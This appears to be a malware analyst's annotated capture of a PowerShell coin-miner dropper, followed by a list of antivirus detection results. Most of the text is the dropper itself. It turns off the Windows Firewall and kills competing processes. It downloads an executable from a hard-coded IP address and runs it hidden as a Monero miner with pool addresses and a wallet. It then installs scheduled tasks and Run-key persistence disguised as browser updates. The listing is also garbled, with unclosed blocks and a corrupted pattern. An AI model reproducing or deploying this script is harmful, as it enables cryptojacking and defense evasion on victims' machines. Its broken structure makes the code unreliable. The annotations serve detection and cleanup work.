# Analyst annotation of a captured PowerShell dropper (see the AV verdicts below:
# the sample is classified as a coin-miner loader). Code is left byte-identical;
# comments record what each visible line does for triage, detection and cleanup.
# NOTE(review): the for/if blocks opened on the lines below are never closed in this
# listing, so the capture looks truncated or garbled at the end of the script.

# Base URL for the payload download (used by the two DownloadFile calls below).
$cc = "http://80.71.158.96"
# Random 6..12-character lowercase alphanumeric string; not referenced on any
# visible line — presumably intended as a name/nonce further down, cannot confirm.
$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
# Two drop locations for the same binary (AppData and TMP); both are worth
# checking during cleanup.
$dst="$env:AppData\network02.exe"
$dst2="$env:TMP\network02.exe"
# Defense evasion: Windows Firewall disabled for all profiles. A firewall state
# change from a PowerShell parent is a strong detection signal on its own.
netsh advfirewall set allprofiles state off
# Kills processes matching these names — likely competing miners (kthreaddi,
# sysrv*) and earlier copies of this payload (network0*); inference from names.
Get-Process network0*, kthreaddi, sysrv, sysrv012, sysrv011, sysrv010, sysrv00* -ErrorAction SilentlyContinue | Stop-Process
# ps | Where-Object { $_.cpu -gt 50 -and $_.name -ne "[kthreaddi]" } | Stop-Process
# Enumerates TCP connections and kills any process whose foreign-address column
# ($k[2] after whitespace split) ends in one of the listed ports; $k[4] is the PID
# column of `netstat -ano`. Again consistent with removing rival miners.
$list = netstat -ano | findstr TCP
for ($i = 0; $i -lt $list.Length; $i++) {
$k = [Text.RegularExpressions.Regex]::Split($list[$i].Trim(), '\s+')
if ($k[2] -match "(:3333|:4444|:5555|:7777|:9000)$") {
Stop-Process -id $k[4]
# Guard: only (re)download when no matching process is running. The pattern
# `*network02]` is probably a corrupted `*network02*` — treat as capture damage.
if (!(Get-Process *network02] -ErrorAction SilentlyContinue)) {
# Payload fetch over plain HTTP into both drop paths (same remote file).
(New-Object Net.WebClient).DownloadFile("$cc/wxm.exe", "$dst")
(New-Object Net.WebClient).DownloadFile("$cc/wxm.exe", "$dst2")
# Execution, hidden window. The arguments (--donate-level, -o pool, -u wallet)
# are consistent with an XMRig-style miner; the pool hosts/IPs and the wallet
# string are the network and payment IoCs for this sample.
Start-Process "$dst2" "--donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ" -windowstyle hidden
# Persistence, four redundant mechanisms: two scheduled tasks firing every minute
# ("BrowserUpdate", "Browser2Update") and two HKCU Run values ("Run", "Run2"),
# one pair per drop path. All four must be removed together or the miner returns.
schtasks /create /F /sc minute /mo 1 /tn "BrowserUpdate" /tr "$dst --donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B"
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run /d "$dst --donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B" /t REG_SZ /f
schtasks /create /F /sc minute /mo 1 /tn "Browser2Update" /tr "$dst2 --donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B"
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d "$dst2 --donate-level 1 -o b.oracleservice.top -o 198.23.214.117:8080 -o 51.79.175.139:8080 -o 167.114.114.169:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B" /t REG_SZ /f
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Miner.4!c
MicroWorld-eScan Heur.BZC.PZQ.Biom.8.4644D49B
FireEye Heur.BZC.PZQ.Biom.8.4644D49B
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Trojan.PS.CoinMiner.XU
Cyren PSH/CoinMiner.B
Symantec Trojan Horse
ESET-NOD32 PowerShell/CoinMiner.CC
TrendMicro-HouseCall TROJ_FRS.0NA103AJ22
Avast Other:Malware-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Miner.gen
BitDefender Heur.BZC.PZQ.Biom.8.4644D49B
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Heur.BZC.PZQ.Biom.8.4644D49B
Emsisoft Heur.BZC.PZQ.Biom.8.4644D49B (B)
Comodo Clean
F-Secure Clean
DrWeb PowerShell.BtcMine.1
VIPRE Clean
TrendMicro TROJ_FRS.0NA103AJ22
McAfee-GW-Edition Clean
CMC Clean
Sophos Troj/PSDl-MG
GData Heur.BZC.PZQ.Biom.8.4644D49B
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
Microsoft Clean
AhnLab-V3 Clean
BitDefenderTheta Clean
ALYac Heur.BZC.PZQ.Biom.8.4644D49B
MAX malware (ai score=87)
VBA32 Clean
Zoner Clean
Tencent Script.Trojan.Miner.Ajvb
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Other:Malware-gen [Trj]
Panda Clean